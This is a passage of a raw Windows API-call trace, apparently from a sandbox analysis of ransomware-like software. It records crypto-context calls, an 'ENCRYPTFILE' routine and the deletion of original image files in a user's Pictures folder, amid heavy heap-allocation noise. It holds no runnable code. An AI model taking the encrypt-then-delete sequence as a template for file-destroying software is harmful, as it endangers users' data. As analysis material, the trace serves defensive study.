lpNumberOfBytesWritten=0x144ef3c*=0xc720, lpOverlapped=0x0) returned 1 [0092.726] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0092.727] CryptDestroyKey (hKey=0x41ac140) returned 1 [0092.727] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.727] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.727] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0092.728] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0092.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.728] FreeLibrary (hLibModule=0x756e0000) returned 1 [0092.728] CloseHandle (hObject=0x298) returned 1 [0092.728] CloseHandle (hObject=0x258) returned 1 [0092.731] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp", lpFilePart=0x0) returned 0x37 [0092.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0092.731] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7ykcclus8obszjabi0l.bmp")) returned 0x20 [0092.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0092.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0092.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0092.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0092.732] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2e8c0, ftCreationTime.dwHighDateTime=0x1d5e92b, ftLastAccessTime.dwLowDateTime=0x172e55b0, ftLastAccessTime.dwHighDateTime=0x1d5ee4e, ftLastWriteTime.dwLowDateTime=0x172e55b0, ftLastWriteTime.dwHighDateTime=0x1d5ee4e, nFileSizeHigh=0x0, nFileSizeLow=0xc713, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7yKccLuS8OBSzjABi0L.bmp", cAlternateFileName="7YKCCL~1.BMP")) returned 0x41ac780 [0092.732] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7ykcclus8obszjabi0l.bmp")) returned 1 [0092.864] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2e8c0, ftCreationTime.dwHighDateTime=0x1d5e92b, ftLastAccessTime.dwLowDateTime=0x172e55b0, ftLastAccessTime.dwHighDateTime=0x1d5ee4e, ftLastWriteTime.dwLowDateTime=0x172e55b0, ftLastWriteTime.dwHighDateTime=0x1d5ee4e, nFileSizeHigh=0x0, nFileSizeLow=0xc713, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7yKccLuS8OBSzjABi0L.bmp", cAlternateFileName="7YKCCL~1.BMP")) returned 0 [0092.864] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0092.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0092.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0092.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0092.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0092.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0092.865] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.865] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0092.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.865] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0092.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.867] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.867] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0092.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.867] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382517a0, ftCreationTime.dwHighDateTime=0x1d5eb00, ftLastAccessTime.dwLowDateTime=0x417af580, ftLastAccessTime.dwHighDateTime=0x1d5ef7f, ftLastWriteTime.dwLowDateTime=0x417af580, ftLastWriteTime.dwHighDateTime=0x1d5ef7f, nFileSizeHigh=0x0, nFileSizeLow=0x9ea4, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="9Y-cpSQgv6l3vMS-rl5.png", cAlternateFileName="9Y-CPS~1.PNG")) returned 0x41ac040 [0092.867] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0092.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0092.868] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0092.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0092.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0092.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca058 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.868] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0092.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.869] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0092.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0092.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0092.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca070 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0092.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0092.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.871] 